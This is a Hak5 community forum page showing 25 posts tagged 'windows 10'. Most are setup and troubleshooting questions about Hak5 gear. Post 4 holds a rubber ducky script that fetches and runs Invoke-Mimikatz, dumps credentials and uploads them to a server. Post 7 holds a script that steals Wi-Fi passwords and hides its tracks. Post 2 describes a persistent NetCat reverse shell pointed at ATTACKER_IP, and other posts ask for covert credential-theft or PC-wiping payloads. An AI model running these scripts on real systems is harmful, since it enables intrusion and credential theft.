Jump to content

Search the Community

Showing results for tags 'windows 10'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. I'm trying to use the wp6 script to get internet but it's not working. I'm properly connected to my home Wi-Fi on my computer. Here is a picture http://pasteboard.co/WGcRSnX.png Any help is appreciated
  2. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  3. Hi, i have been working in a computer store for a while and we get computers in with passwords that the user cant remember or they want us to remove the password. I just help out with the store and try my best to learn what i can but my knowledge is limited. We mainly use password cracking methods such as booting off a cd or usb with a cracking program such as offline PW, these work well but we havent been able to find any that are able to crack windows 10. If there is one out there that has been tested and does in fact work that would be awesome news :D But i would also like to learn how to crack these passwords myself, without using a program to do it for me, even just using a different shell such as kali and use the terminal in there or just the cmd on windows. All help is greatly appreciated, thank you.
  4. Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?
  5. Hello, tried to setup the nano in Windows 10 and Chrome Followed the steps from the video. https://www.wifipineapple.com/pages/faq#collapse-Four But i get no connection from the nano to the internet. On the wifi, i go on properties, and choice the pineapple to share connection. Then i go on the pineapple, to ip4 and change the ip to: and subnetmask to: correct? But it still say "not identified network" and on the pineapple i get message "Error connection to the WIFIPineapple.com. Please check your connection" Tried the network autofix in windows, but it found nothing What can i do? :-/
  6. As the title says i would like to learn to change/spoof my MAC Address, I changed my network cards Locally Administered MAC Address but this did not work as after a restart to make the changes set in i checked my modem-router and it showed that my MAC Address was still the hardwares value rather than the new one i set. If i did someone wrong please let me know, if there is something else i can try im all ears. All help is greatly appreciated.
  7. My first script using the Ducky... Beg stole and borrowed from other peoples code and amended to get to what I wanted, most of the code is form Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise: * It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY * It then uses Select-String cmdlet to get the password for the wireless networks on the target machine * Saves this (albeit slightly messily) to Output.txt on the Ducky * Finally gets rid of the TEMP file and history in the run command window Look forward to comments and anything anyone can suggest to speed this up and make it better. Cheers Audie Ducky Script REM Author: Audie2180 REM Ducky WIFI credential plain text password report: 1.0 REM Target: Windows 10 REM Firmware: Twin Duck 2.1 REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks DELAY 1000 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ----Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM ----Make batch file that waits for SD card to mount. REM ----Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM ----Continue script STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt ENTER CONTROL z ENTER REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Run BAT file DELAY 1000 GUI r DELAY 500 STRING %TEMP%/DuckyWait.bat DELAY 500 ENTER DELAY 800 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM --- Clean up, close CMD, delete tmp files, remove command prompt hist REM --- Cleanup file created DELAY 500 STRING del /f %TEMP%\DuckyWait.bat ENTER REM ----Clear the Run history and exit DELAY 500 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Flash CAPSLOCK CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK ... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file... a.ps1 #Make a list with all WiFi SSID's and passwords stored locally on Windows OS. $output = netsh.exe wlan show profiles $profileRows = $output | Select-String -Pattern 'All User Profile' $profileNames = New-Object System.Collections.ArrayList #for each profile name get the SSID and password for($i = 0; $i -lt $profileRows.Count; $i++){ $profileName = ($profileRows[$i] -split ":")[-1].Trim() $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' if($passwordSearchResult){ $profilePw = ($passwordSearchResult -split ":")[-1].Trim() } else { $profilePw = '' } $networkObject = New-Object -TypeName psobject -Property @{ ProfileName = $profileName SSID = $profileSSID Password = $profilePw } $profileNames.Add($networkObject) } $profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password
  8. So heres whats going on i made a shell, using reverse_tcp. And i put it on victims computer and opened it everything went smoothly in the process of opening the exe, anyways after i opened it, the shell didnt send a tcp connection back to me. Im doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a vm then uploaded it to mediafire and downloaded on other pc. But when i ran it, i didnt get a connection back it was like it was never ran. Heres all my console output currently even after opening i didnt take a screenshot but i did copy and paste. And put it on pastebin, so heres the link hopefully one of you can help me i would also like to say the the target pc had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local ip. That link shows the whole process of setting up the payload and handler thats what all i did. Thanks to everyone who takes the time to read this i really need help.
  9. I walked thru the Windows 10 setup on my PC. Is it possible to do the Android set up on the same device OR would I need a 2nd nano? Can I switch between my laptop and a Android phone for mobile scanning. The windows 10 setup works fine. Don't want to damage it. Thanks for your help.
  10. Followed every step from the video https://www.wifipineapple.com/pages/faq#collapse-Four, but had no success in sharing internet connection with clients connected to NANO. Any clues?
  11. So I am picking up this bad boy today http://www.microcenter.com/product/474706/XPS_15_156_Gaming_Laptop_Computer_-_Silver and I am going to throw Ubuntu 16.04 on it. I am not interested in dual booting as I have been using Linux for years. However, now that Windows 10 doesn't come with physical CD keys anymore does anyone know a way to get the Windows 10 licence key extracted encase I want to throw windows back on it?
  12. As of 10/30/17 kali linux downloads will not work, through both the HTTP download and the torrent link, both debian.exe installer packages can not locate win32-loader.ini on my windows 10 laptop. If anybody has a torrent for the old ISO file it would be much appreciated ive been at this for about 3 hours now and cant find a ISO image to flash onto the usb stick on kali.org and the Virtual images are not working for me either.
  13. Hi Guys, My friend has lent me his harddrive with some music production files (.wav and .mp3 files) on it but he has somehow encrypted the files and has asked me to remove the encryption from it. He says he used Windows 10 and after some digging around found Microsoft uses EFS Encryption. I tried his laptop to remove the encryption as it would have had the key to it and after an hour of playing around he tells me that he re-installed the OS so the key would have been lost. I have searched online for a few answers and found a couple which haven't convinced me. I found this site https://www.elcomsoft.co.uk/aefsdr.html that says it can remove EFS on NTFS but I am not willing to pay the price tag unless I have proof of success If anyone can verify for me that they have a good success rate that would be awesome Or does anyone know if GitHub has any programs that can be run in a Linux OS like Kali or Parrot that I can use to break the encryption?
  14. Hello! I recently ordered a USB Rubber Ducky, and still a noob at it. I was wondering if one of you guys would be kind enough to make it do something, if it's possible. I want it, after it's plugged, to immediately start backing up the windows 10 and then after that it sends saves it online, or I heard about "TwinDuck" which can make it save it on there, which is better... So after it saves a backup on the Ducky, I want it to completely destroy the PC, maybe by erasing "System32" I am not sure I just want it to mess it up and delete everything. All while the backup is still on the rubber ducky. I would really appreciate if one could help me with such a mission, thanks! PS: If it could be compatible with all windows versions, it would be better.
  15. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  16. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  17. I'm trying to upgrade my firmware of this yard stick one. But I keep getting different errors. Now I have the bad address one. root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 erase_all RC = 0 (OK) root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 download firmware/CCBootloader/CCBootloader-rfcat-ys1.hex Writing :0600000002017B02140363 RC = 3 (Bad Address) Error downloading code!
  18. I am finding that I am having an error with some PowerShell code that I am working on. What I want to be able to do is to have a variable, say $uk, where the drive label name is 'backup' and then force the creation of folders using the declared variable as the drive letter eg $uk\$env:computername\$env:username . The code is pasted below: #Asssigns $uk Variable to current drive letter for the mounted volume where the label name = backup $uk = Get-WmiObject Win32_Volume | ? {$_.label -eq 'backup'} #Creates a directory on the C:\ Drive naming the folders [The Computer Name] and [User] and ignores if already exists. md $uk\$env:computername\$env:username -force | Out-Null #It then uses Get-WmiObject to get the OS information and exports this info to the created directory calling the file export.csv. Get-WmiObject -class win32_operatingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv #Then echos Export Complete into console. echo "Export Complete" #Sleep for two seconds. Start-Sleep -s 2 #Kill Powershell process. #stop-process -Id $Pid However, when this runs I get this error: md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException + FullyQualifiedErrorId : ItemExistsArgumentError,Microsoft.PowerShell.Commands.NewItemCommand md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...\"\MATT-PC\Matt:String) [New-Item], Argu mentException + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand Export-Csv : Cannot perform operation because the wildcard path \\MATT-PC\root\cimv2:Win32_Volume.DeviceID= "\\\\?\\Volume{2277fba4-e118-11e3-8533-94de807ff6ed}\\"\MATT-PC\Matt\export.csv did not resolve to a file. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:10 char:46 + ... ingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : OpenError: (\\MATT-PC\root\...Matt\export.csv:String) [Export-Csv], FileNotF oundException + FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.ExportCsvCommand Obviously there is an error in the file path where it is trying to get the volume. I am not too sure how i would fix this tried wrapping the variable name in ${} and with a :\ after the variable eg $uk:\, neither of these produce the desired result. Can anyone help? Matt
  19. Can somebody of the staff answer this question please. How can i get RNDIS_ethernet to work on windows 10?
  20. Has anyone encountered issues when plugging the Bash Bunny into a Windows 10 Machine? RNDIS_EHTERNET on Windows 10 brings up a Device Driver Install window which stays on the screen for some time. This can be minimized via the bunny script; however I wasn't sure if this was an expected behavior.
  21. Has anyone else come across any driver issues with the RNDIS or WPD drivers for BashBunny on Windows 10 x64 Build 14393? Flash drive loads, payload is set for ATTACKMODE RNDIS_ETHERNET STORAGE and the device shows in device manager but without drivers.
  22. Greetings, I just received the BashBunny in the mail, so please bare with me. I was just trying to get started, when I ran into problems trying to share an internet connection w/ Windows 10. If I use the default payload on switch 2, ATTACKMODE RNDIS_ETHERNET STORAGE, or vise versa, it refuses to pop up as an Ethernet device in Windows. Just RNDIS_ETHERNET works, but isn't that kind of a problem when it comes to saving loot? On a side note: " Many combinations of attack modes are possible, however some are not. For example, ATTACKMODE HID STORAGE ECM_ETHERNET is valid while ATTACKMODE RNDIS_ETHERNET ECM_ETHERNET STORAGE SERIAL is not." - http://wiki.bashbunny.com/#!index.md How do I know what is a proper attackmode combination?
  23. Hi, I have my Nano setup properly on 2 laptops. However when I try to use my desktop at home there is no dropdown box to select the pineapple for internet sharing in the configure adapters menu for Win 10? I have tried disabling Defender which was suggested on another site, did not fix it. :( Any help would be greatly appreciated Here is a screenshot there should be a dropdown menu under Allow other network users to connect
  24. Hello, First time posting, so please feel free to correct me if I am posting in the wrong place. I am finally upgrading my old rig to 64bit and reformating so to have a clean install with multiple partitions, so I can easily reformat in the future. What I was trying to find and could not locate was the episode in the pre-revision3 days where Derren had made a boot disk with all of the softwares he wanted were already pre-installed on the os. I would like to do the same but in a reformat drive. Where I would boot my pc into and do a clean install with all my softwares already there just need to load keys or update them. At one point I thought I would make my set up and then make a ghost image of it on a drive. So I would just copy the image back over the drive with my os on it. Can this be done on windows 10 and how should I go about it.
  25. I purchased the Rubber Ducky recently to grab windows login creds from Windows 10. I was unaware at the time that it wouldn't quite work as solid on 10 as it does with older versions of windows. After testing on various other versions and having it upload the .creds to my server nothing happened when I attempted it on my target machine (Windows 10). I played around with quite a bit and finally got the .creds uploading but with 0 data. Doing some research I came across this page explaining using PowerMemory to edit the registry for storing plaintext credentials. I did this the manual way, rebooted, and viola I have my .creds file on the server with the credentials. However this was done on a test machine and not my target machine. HERE IS MY REQUEST: Does anyone have or can write a payload to automate this process in a stealth manner much like the Mr Robot payload? Maybe I am overlooking something as I am so new to this. Also it could be possible that it would have worked without PowerMemory editing the registry as I disabled Windows Defender before trying PM as I saw it has blocked some MK features during my previous attempts. Any feedback would be greatly appreciated!
  • Create New...